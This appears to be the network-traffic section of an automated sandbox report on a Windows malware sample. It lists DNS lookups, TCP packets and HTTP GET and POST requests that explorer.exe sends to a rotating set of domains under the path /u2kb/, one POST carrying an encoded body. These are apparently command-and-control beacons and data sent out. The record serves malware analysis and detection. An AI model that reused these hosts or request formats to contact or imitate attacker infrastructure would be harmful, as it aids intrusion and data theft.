                                                                                            Mar 20, 2023 17:00:18.309813023 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.309829950 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.309983015 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.310110092 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.315315962 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.315392017 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:18.315614939 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.315768957 CET4970480192.168.2.4213.145.228.111
                                                                                            Mar 20, 2023 17:00:18.337511063 CET8049704213.145.228.111192.168.2.4
                                                                                            Mar 20, 2023 17:00:23.389631987 CET4970580192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:23.410263062 CET804970581.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:23.411360979 CET4970580192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:23.411557913 CET4970580192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:23.432117939 CET804970581.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:23.439126015 CET804970581.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:23.439161062 CET804970581.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:23.439269066 CET4970580192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:24.921346903 CET4970580192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:25.935039043 CET4970680192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:25.955620050 CET804970681.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:25.955746889 CET4970680192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:25.955923080 CET4970680192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:25.976299047 CET804970681.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:25.984287977 CET804970681.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:25.984392881 CET804970681.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:25.984517097 CET4970680192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:25.984925985 CET4970680192.168.2.481.17.18.198
                                                                                            Mar 20, 2023 17:00:26.005337000 CET804970681.17.18.198192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.187412977 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.329245090 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.329423904 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.403007030 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.549699068 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549746990 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549766064 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549777985 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549799919 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549818993 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549839020 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549860001 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549881935 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549896002 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.549894094 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.549969912 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.549969912 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.691642046 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691680908 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691701889 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691723108 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691741943 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691761971 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691783905 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691790104 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.691801071 CET804970745.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.691849947 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:31.691849947 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:32.921936035 CET4970780192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:33.935620070 CET4970880192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:34.077534914 CET804970845.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:34.077850103 CET4970880192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:34.078017950 CET4970880192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:34.220544100 CET804970845.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:34.220573902 CET804970845.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:34.220809937 CET4970880192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:34.232002020 CET4970880192.168.2.445.33.30.197
                                                                                            Mar 20, 2023 17:00:34.373982906 CET804970845.33.30.197192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.322328091 CET4970980192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:39.494704008 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.494884968 CET4970980192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:39.495053053 CET4970980192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:39.665088892 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.794625998 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.794667959 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.794712067 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.794739962 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.794764996 CET8049709199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.794841051 CET4970980192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:39.794923067 CET4970980192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:40.998440027 CET4970980192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.015089035 CET4971080192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.185204029 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.185324907 CET4971080192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.185417891 CET4971080192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.357618093 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.543080091 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.543170929 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.543256998 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.543301105 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.543340921 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:42.543472052 CET4971080192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.543545008 CET4971080192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.543977022 CET4971080192.168.2.4199.192.30.147
                                                                                            Mar 20, 2023 17:00:42.714270115 CET8049710199.192.30.147192.168.2.4
                                                                                            Mar 20, 2023 17:00:47.682415962 CET4971180192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:47.856125116 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:47.856369019 CET4971180192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:47.856537104 CET4971180192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:48.029783964 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285394907 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285434961 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285448074 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285460949 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285475016 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285486937 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285506010 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285518885 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285531044 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285541058 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.285773993 CET4971180192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:49.287417889 CET804971185.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:49.287564993 CET4971180192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:49.358699083 CET4971180192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:50.376454115 CET4971280192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:50.552869081 CET804971285.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:50.553164005 CET4971280192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:50.553251028 CET4971280192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:50.729526043 CET804971285.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:51.294475079 CET804971285.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:51.294590950 CET804971285.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:00:51.294851065 CET4971280192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:51.294931889 CET4971280192.168.2.485.187.128.34
                                                                                            Mar 20, 2023 17:00:51.471132994 CET804971285.187.128.34192.168.2.4
                                                                                            Mar 20, 2023 17:01:02.697170973 CET4971380192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:02.822989941 CET8049713192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:02.823105097 CET4971380192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:02.846653938 CET4971380192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:02.970787048 CET8049713192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:02.980871916 CET8049713192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:02.981080055 CET8049713192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:02.981174946 CET4971380192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:05.224484921 CET4971380192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:07.012991905 CET4971480192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:07.137528896 CET8049714192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:07.137660980 CET4971480192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:07.897346020 CET4971480192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:08.022238970 CET8049714192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:08.032902956 CET8049714192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:08.033061028 CET8049714192.185.17.12192.168.2.4
                                                                                            Mar 20, 2023 17:01:08.034182072 CET4971480192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:08.428540945 CET4971480192.168.2.4192.185.17.12
                                                                                            Mar 20, 2023 17:01:08.553136110 CET8049714192.185.17.12192.168.2.4

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 20, 2023 16:59:46.136440992 CET5657253192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 16:59:46.156369925 CET53565728.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 16:59:51.451244116 CET5091153192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 16:59:51.474733114 CET53509118.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 16:59:59.107836008 CET5968353192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 16:59:59.125689983 CET53596838.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:06.763504028 CET6416753192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:06.785231113 CET53641678.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:15.491092920 CET5856553192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:15.519546032 CET53585658.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:23.355577946 CET5223953192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:23.388257980 CET53522398.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:31.040029049 CET5680753192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:31.183070898 CET53568078.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:39.271570921 CET6100753192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:39.320899963 CET53610078.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:47.549798012 CET6068653192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:47.680247068 CET53606868.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:56.317701101 CET6112453192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:56.368645906 CET53611248.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:00:57.380626917 CET5944453192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:00:57.408945084 CET53594448.8.8.8192.168.2.4
                                                                                            Mar 20, 2023 17:01:02.477611065 CET5557053192.168.2.48.8.8.8
                                                                                            Mar 20, 2023 17:01:02.627077103 CET53555708.8.8.8192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Mar 20, 2023 16:59:46.136440992 CET192.168.2.48.8.8.80x7d04Standard query (0)www.white-hat.ukA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 16:59:51.451244116 CET192.168.2.48.8.8.80xcb57Standard query (0)www.gritslab.comA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 16:59:59.107836008 CET192.168.2.48.8.8.80x9da5Standard query (0)www.bitservicesltd.comA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:06.763504028 CET192.168.2.48.8.8.80xf43cStandard query (0)www.222ambking.orgA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:15.491092920 CET192.168.2.48.8.8.80x4b72Standard query (0)www.energyservicestation.comA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:23.355577946 CET192.168.2.48.8.8.80xe0bcStandard query (0)www.younrock.comA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.040029049 CET192.168.2.48.8.8.80x5edbStandard query (0)www.thewildphotographer.co.ukA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:39.271570921 CET192.168.2.48.8.8.80x317eStandard query (0)www.shapshit.xyzA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:47.549798012 CET192.168.2.48.8.8.80x692bStandard query (0)www.thedivinerudraksha.comA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:56.317701101 CET192.168.2.48.8.8.80x95e7Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:57.380626917 CET192.168.2.48.8.8.80x29b0Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:01:02.477611065 CET192.168.2.48.8.8.80xbf61Standard query (0)www.un-object.comA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Mar 20, 2023 16:59:46.156369925 CET8.8.8.8192.168.2.40x7d04No error (0)www.white-hat.ukwhite-hat.ukCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 20, 2023 16:59:46.156369925 CET8.8.8.8192.168.2.40x7d04No error (0)white-hat.uk94.176.104.86A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 16:59:51.474733114 CET8.8.8.8192.168.2.40xcb57No error (0)www.gritslab.comgritslab.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 20, 2023 16:59:51.474733114 CET8.8.8.8192.168.2.40xcb57No error (0)gritslab.com78.141.192.145A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 16:59:59.125689983 CET8.8.8.8192.168.2.40x9da5No error (0)www.bitservicesltd.com161.97.163.8A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:06.785231113 CET8.8.8.8192.168.2.40xf43cNo error (0)www.222ambking.org91.195.240.94A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:15.519546032 CET8.8.8.8192.168.2.40x4b72No error (0)www.energyservicestation.com213.145.228.111A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:23.388257980 CET8.8.8.8192.168.2.40xe0bcNo error (0)www.younrock.com81.17.18.198A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.30.197A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.79.19.196A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.56.79.23A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.20.235A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk72.14.178.174A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk198.58.118.167A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk96.126.123.244A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk72.14.185.43A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.2.79A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk173.255.194.134A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.18.44A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:31.183070898 CET8.8.8.8192.168.2.40x5edbNo error (0)www.thewildphotographer.co.uk45.33.23.183A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:39.320899963 CET8.8.8.8192.168.2.40x317eNo error (0)www.shapshit.xyz199.192.30.147A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:47.680247068 CET8.8.8.8192.168.2.40x692bNo error (0)www.thedivinerudraksha.comthedivinerudraksha.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:47.680247068 CET8.8.8.8192.168.2.40x692bNo error (0)thedivinerudraksha.com85.187.128.34A (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:56.368645906 CET8.8.8.8192.168.2.40x95e7Name error (3)www.fclaimrewardccpointq.shopnonenoneA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:00:57.408945084 CET8.8.8.8192.168.2.40x29b0Name error (3)www.fclaimrewardccpointq.shopnonenoneA (IP address)IN (0x0001)false
                                                                                            Mar 20, 2023 17:01:02.627077103 CET8.8.8.8192.168.2.40xbf61No error (0)www.un-object.comun-object.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Mar 20, 2023 17:01:02.627077103 CET8.8.8.8192.168.2.40xbf61No error (0)un-object.com192.185.17.12A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • www.white-hat.uk
                                                                                            • www.gritslab.com
                                                                                            • www.bitservicesltd.com
                                                                                            • www.222ambking.org
                                                                                            • www.energyservicestation.com
                                                                                            • www.younrock.com
                                                                                            • www.thewildphotographer.co.uk
                                                                                            • www.shapshit.xyz
                                                                                            • www.thedivinerudraksha.com
                                                                                            • www.un-object.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.44969694.176.104.8680C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 16:59:46.201874018 CET93OUTGET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1
                                                                                            Host: www.white-hat.uk
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Mar 20, 2023 16:59:46.439270973 CET94INHTTP/1.1 301 Moved Permanently
                                                                                            Connection: close
                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            x-redirect-by: WordPress
                                                                                            location: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==
                                                                                            x-litespeed-cache: miss
                                                                                            content-length: 0
                                                                                            date: Mon, 20 Mar 2023 15:59:49 GMT
                                                                                            server: LiteSpeed


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.44969778.141.192.14580C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 16:59:51.510987997 CET95OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.gritslab.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.gritslab.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.gritslab.com/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
                                                                                            Mar 20, 2023 16:59:51.538933992 CET96INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Mon, 20 Mar 2023 15:59:51 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            10192.168.2.44970681.17.18.19880C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:25.955923080 CET139OUTGET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1
                                                                                            Host: www.younrock.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Mar 20, 2023 17:00:25.984287977 CET140INHTTP/1.1 200 OK
                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                            connection: close
                                                                                            content-length: 604
                                                                                            content-type: text/html; charset=utf-8
                                                                                            date: Mon, 20 Mar 2023 16:00:25 GMT
                                                                                            server: nginx
                                                                                            set-cookie: sid=53fe07ee-c738-11ed-8329-5bbe752609ee; path=/; domain=.younrock.com; expires=Sat, 07 Apr 2091 19:14:32 GMT; max-age=2147483647; HttpOnly
